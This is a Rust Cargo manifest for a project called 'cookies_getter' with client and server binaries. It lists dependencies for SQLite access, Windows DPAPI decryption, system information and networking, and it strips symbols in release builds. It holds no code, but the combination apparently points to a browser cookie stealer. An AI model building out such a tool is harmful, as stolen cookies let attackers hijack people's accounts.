[package]
name = "cookies_getter"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[[bin]]
name = "client"
path = "src/client/main.rs"

[[bin]]
name = "server"
path = "src/server/main.rs"

[dependencies]
rusqlite = { version = "0.29.0", features = ["bundled", "blob"] }
base64 = "0.21.0"
openssl = "0.10.52"
uuid = { version = "1.3.2", features = ["v4"] }
serde = { version = "1.0.104", features = ["derive"] }
serde_json = "1.0.96"
num-traits = "0.2.15"
num-derive = "0.3.3"
sysinfo = "0.29.10"
trust-dns-resolver = "0.23.1"
ring = "0.17.3"

[target.'cfg(windows)'.dependencies]
winapi = { version = "0.3.9", features = ["dpapi"] }

[profile.release]
strip = true
opt-level = 3
debug = 0
panic = "abort"
